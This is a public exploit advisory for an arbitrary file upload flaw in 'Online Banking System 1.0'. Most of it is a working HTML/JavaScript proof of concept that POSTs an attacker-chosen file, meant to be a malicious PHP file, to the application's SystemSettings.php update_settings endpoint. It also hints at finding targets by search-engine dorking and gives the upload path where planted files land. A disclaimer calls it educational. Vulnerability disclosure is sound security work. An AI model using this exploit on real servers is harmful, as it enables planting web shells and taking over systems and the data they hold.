Headline
Online Banking System 1.0 Arbitrary File Upload
Online Banking System version 1.0 suffers from an arbitrary file upload vulnerability.
=============================================================================================================================================
| # Title : Online Banking System 1.0 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/banking.zip |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] This HTML page is designed to remotely upload PHP malicious files directly.
[+] Here’s a breakdown of its components and functionality:
HTML Structure:
DOCTYPE & <html>: Defines the document type and language.
<head>: Contains meta-information about the document like character encoding and viewport settings, and the title of the page.
<body>: Contains the main content of the page.
Form Elements:
<form id="uploadForm">: A form with the ID "uploadForm" that contains input fields and a button for file upload.
<label> and <input> fields: Collect information from the user:
Target IP: IP address where the file will be uploaded.
Attacker IP: The IP address of the attacker (though this field is not used in the script).
Attacker Port: The port number of the attacker (not used in the script).
File Input: Allows the user to select a file to upload.
<button>: A button that triggers the file upload process when clicked.
JavaScript Functionality:
uploadFile(): Function executed when the "Upload File" button is clicked.
Collects input values: Retrieves values from the input fields and the selected file.
Validation: Checks if all fields are filled and a file is selected. Alerts the user if any field is missing.
FormData Object: Creates a FormData object to package the file and additional data (name with the value 'PWNED').
fetch API: Sends a POST request to the target IP with the file attached:
URL: http://${targetIP}/banking/classes/SystemSettings.php?f=update_settings
Response Handling: Logs success or failure based on the server's response. If the response is '1', it indicates success; otherwise, it logs an error.
Security Note:
Potential Risk: This script is for educational purposes, and its functionality (uploading a file to a specified server) could be misused.
It’s crucial to ensure that any file upload functionality is properly secured and validated to prevent unauthorized access or attacks.
[+] Line 45 set url of target.
[+] Choose the target IP .
[+] Put any IP address of your own .
[+] Put any port .
[+] The path to upload the files : http://localhost/banking/uploads/
[+] Save Code as html :
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Direct File Upload</title>
</head>
<body>
<h2>Direct File Upload</h2>
<form id="uploadForm">
<label for="targetIP">Target IP:</label>
<input type="text" id="targetIP" name="targetIP" required><br><br>
<label for="attackerIP">Attacker IP:</label>
<input type="text" id="attackerIP" name="attackerIP" required><br><br>
<label for="attackerPort">Attacker Port:</label>
<input type="number" id="attackerPort" name="attackerPort" required><br><br>
<label for="fileInput">Select File:</label>
<input type="file" id="fileInput" name="fileInput" required><br><br>
<button type="button" onclick="uploadFile()">Upload File</button>
</form>
<script>
function uploadFile() {
const targetIP = document.getElementById('targetIP').value;
const attackerIP = document.getElementById('attackerIP').value;
const attackerPort = document.getElementById('attackerPort').value;
const fileInput = document.getElementById('fileInput').files[0];
if (!targetIP || !attackerIP || !attackerPort || !fileInput) {
alert('Please fill in all fields and select a file.');
return;
}
const formData = new FormData();
formData.append('name', 'PWNED');
formData.append('img', fileInput);
console.log("(+) Uploading file...");
fetch(`http://${targetIP}/banking/classes/SystemSettings.php?f=update_settings`, {
method: 'POST',
body: formData
})
.then(response => response.text())
.then(data => {
if (data === '1') {
console.log("(+) File upload seems to have been successful!");
} else {
console.log("(-) Oh no, the file upload seems to have failed!");
}
})
.catch(error => console.error("(-) Error during file upload:", error));
}
</script>
</body>
</html>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================